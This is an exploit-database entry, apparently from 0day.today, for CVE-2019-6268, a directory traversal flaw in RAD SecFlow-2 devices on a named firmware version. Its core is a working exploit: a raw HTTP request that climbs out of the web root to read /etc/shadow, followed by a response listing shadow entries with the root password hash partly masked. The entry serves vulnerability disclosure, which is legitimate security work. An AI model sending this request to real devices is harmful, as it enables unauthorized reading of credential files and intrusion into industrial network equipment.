Lucene search
Branko Milicevic1337DAY-ID-39418HistoryMar 05, 2024 - 12:00 a.m.
RAD SecFlow-2 Path Traversal Vulnerability
2024-03-0500:00:00
Branko Milicevic
0day.today
98
rad secflow-2
path traversal
vulnerability
unauthorized access
sensitive files
cve-2019-6268
directory traversal
exploit.
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.
# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63
# CVE: CVE-2019-6268
# Exploit Author: Branko Milicevic
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.
Steps to reproduce:
Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1
Response:
HTTP/1.1 200 OK
root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal
Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).
Reference
https://www.owasp.org/index.php/Path_Traversal
Related
ics
ics
RAD Data Communications SecFlow-2
2024-06-18 12:00:00
cvelist
cvelist
CVE-2019-6268
2024-03-08 00:00:00
nvd
nvd
CVE-2019-6268
2024-03-08 02:15:47
cve
cve
CVE-2019-6268
2024-03-08 02:15:47
prion
prion
Directory traversal
2024-03-08 02:15:00
packetstorm
packetstorm
RAD SecFlow-2 Path Traversal
2024-03-05 00:00:00